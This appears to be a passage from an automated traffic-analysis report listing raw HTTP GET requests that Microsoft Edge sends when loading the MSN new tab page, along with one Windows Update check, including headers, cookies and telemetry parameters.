Source: global traffic HTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=nkGyhUBOnovzuz5&MD=oygleuew HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /resolver/api/resolve/v3/config/?expType=AppConfig&expInstance=default&apptype=edgeChromium&v=20240423.509&targetScope={%22audienceMode%22:%22adult%22,%22browser%22:{%22browserType%22:%22edgeChromium%22,%22version%22:%22117%22,%22ismobile%22:%22false%22},%22deviceFormFactor%22:%22desktop%22,%22domain%22:%22ntp.msn.com%22,%22locale%22:{%22content%22:{%22language%22:%22en%22,%22market%22:%22us%22},%22display%22:{%22language%22:%22en%22,%22market%22:%22us%22}},%22os%22:%22windows%22,%22platform%22:%22web%22,%22pageType%22:%22dhp%22,%22pageExperiments%22:[%22prg-1s-mm-wid-t%22,%22prg-1s-sm-workid%22,%22prg-1s-twid%22,%22prg-1s-workid%22,%22prg-1s-wpocfpc%22,%22prg-1sw-finvldc%22,%22prg-1sw-fli-ex2c%22,%22prg-1sw-iconmap%22,%22prg-1sw-iplsd-ntp%22,%22prg-1sw-iplsdc-ntp%22,%22prg-1sw-iplsdc1p2%22,%22prg-1sw-iplsdp1%22,%22prg-1sw-iplsdp2%22,%22prg-1sw-lksincstbl%22,%22prg-1sw-p1widinc%22,%22prg-1sw-p1widinc-2d%22,%22prg-1sw-pde0%22,%22prg-1sw-popularc%22,%22prg-1sw-rr2fn%22,%22prg-1sw-rr2fp%22,%22prg-1sw-sa-annquota14%22,%22prg-1sw-sa-distillation4-t1%22,%22prg-1sw-sa-ntf-ddp-c%22,%22prg-1sw-sacfxevery2-t1%22,%22prg-1sw-saerevrfcc%22,%22prg-1sw-sageimterav3i2c%22,%22prg-1sw-sim-adapt%22,%22prg-1sw-socc-ntp%22,%22prg-1sw-socc-p1%22,%22prg-1sw-socc-p2%22,%22prg-1sw-srdus%22,%22prg-1sw-wxmptreplace%22,%22prg-2unified-uc-t%22,%22prg-ad-ai-imgf-c%22,%22prg-ad-pdedupe-c%22,%22prg-ad-va-rf-c%22,%22prg-adspeek%22,%22prg-bttd-c%22,%22prg-c-arb-rsz%22,%22prg-cg-c-hb%22,%22prg-cg-cmga%22,%22prg-cg-cmgroupa%22,%22prg-cg-dom-cleac%22,%22prg-cg-featured-c%22,%22prg-cg-homepagec%22,%22prg-cg-ingames-ct%22,%22prg-cg-notf%22,%22prg-cg-notf2%22,%22prg-cg-ntv-ad-blnd%22,%22prg-chnl-umf-follow%22,%22prg-chpg-ldgw%22,%22prg-co-ctr%22,%22prg-cookiecont%22,%22prg-csacclink-c%22,%22prg-ctr-pnpc%22,%22prg-entpremier-pr2-c%22,%22prg-fin-cdicon%22,%22prg-fin-cnosign%22,%22prg-fin-errde%22,%22prg-fin-l2tnews%22,%22prg-fin-l2tnews1%22,%22prg-mon-qcrfs%22,%22prg-p2-prmft%22,%22prg-p2-wx2lrot%22,%22prg-pr2-entprem-c%22,%22prg-pr2-flashrev%22,%22prg-pr2-noreqcap%22,%22prg-pr2-pagecontext%22,%22prg-pr2-shoreline%22,%22prg-pr2-sidebar%22,%22prg-pr2-sidebar-5-t%22,%22prg-pr2-svganimac%22,%22prg-rfrcsmc%22,%22prg-rpt2%22,%22prg-sh-bd-disgb-c%22,%22prg-sh-bd-newbanner%22,%22prg-sh-bd-newchckot%22,%22prg-sh-bd-nwchk%22,%22prg-sh-bd-pagoff%22,%22prg-sh-bd-ts%22,%22prg-sh-bd-video%22,%22prg-sh-dealsdaypdp%22,%22prg-sh-lowinv%22,%22prg-sh-lowinv1%22,%22prg-sh-recopdp%22,%22prg-sh-rmitmlnk%22,%22prg-sp-liveapi%22,%22prg-sp-nba24%22,%22prg-sp-nhl24%22,%22prg-sriver-wpo%22,%22prg-strrtng-g1%22,%22prg-ugc-likechange%22,%22prg-unified-p2%22,%22prg-upsaip-r-t%22,%22prg-upsaip-w1-t%22,%22prg-vidbuf1%22,%22prg-whp-minil1%22,%22prg-wx-ncar%22]} HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/11
Source: global traffic HTTP traffic detected: GET /c.gif?rnd=1713906139241&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e77229bad79f43ca83b8b957c0f02b66&activityId=e77229bad79f43ca83b8b957c0f02b66&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /b?rn=1713906139242&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=09C025F5A71D6FE2180F319FA60A6E8D&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_topics-shared-state_dist_TopicData_connector_js-libs_topics-shared-state_dist_TopicData_-62f9da.338ce1fb43cf41e7abe5.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/topicData.2b96ade0ff66928c1ebb.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/channel-data-connector.02a4c4f575b24365379f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/nurturing-placement-manager.5ea7db000698f8928d23.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /c.gif?rnd=1713906139241&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e77229bad79f43ca83b8b957c0f02b66&activityId=e77229bad79f43ca83b8b957c0f02b66&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=59892F5548B8410F875CC582C027017F&RedC=c.msn.com&MXFR=09C025F5A71D6FE2180F319FA60A6E8D HTTP/1.1Host: c.bing.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-MS-GEC: AA3F3A36179501D1BB719097791ED2061AD744BADEDF443DFF44FDF5C2CE7FF5Sec-MS-GEC-Version: 1-117.0.2045.47Referer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /b2?rn=1713906139242&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=09C025F5A71D6FE2180F319FA60A6E8D&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=132ee5f1be77e922e6653ec1713906140; PID=123ee5f1be931922e66559f1713906140; XID=132ee5f1be77e922e6653ec1713906140
Source: global traffic HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=09C025F5A71D6FE2180F319FA60A6E8D&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=8684241135348538038&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308|10837393&bcnt=1|1&asid=1124273d17bd4f5db59c2e1a7b4e70fe HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/serviceBasedChannelDataProvider.9c4c33b7b565b7ebefde.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/storyManager.dd315fba1ee6c20bdb3d.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /service/msn/user?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&ocid=pdp-peregrine&cm=en-us&it=app&user=m-09C025F5A71D6FE2180F319FA60A6E8D&scn=APP_ANON HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-feed-libs.1f70b20165d70f57b9b6.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-cscore.ad7a6dce7dbdf996219b.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/super-nav.65258d4f38c7e7963827.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA12Qge8.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /c.gif?rnd=1713906139241&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e77229bad79f43ca83b8b957c0f02b66&activityId=e77229bad79f43ca83b8b957c0f02b66&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=59892F5548B8410F875CC582C027017F&MUID=09C025F5A71D6FE2180F319FA60A6E8D HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; SM=T
Source: global traffic HTTP traffic detected: GET /staticsb/statics//latest/icons-wc/icons/MicrosoftStartLogo_dark.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB14D0jG.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /1d6b80ab-342d-4031-8b17-fa7a415a779b/185e9ae8-e7e7-42c3-a20e-948d9a41b4bf.mp4 HTTP/1.1Host: prod-streaming-video-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoReferer: https://ntp.msn.com/Accept-Language: en-GB,en;q=0.9,en-US;q=0.8Range: bytes=0-
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/shopping-notification.ee3fd8838e9012979570.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
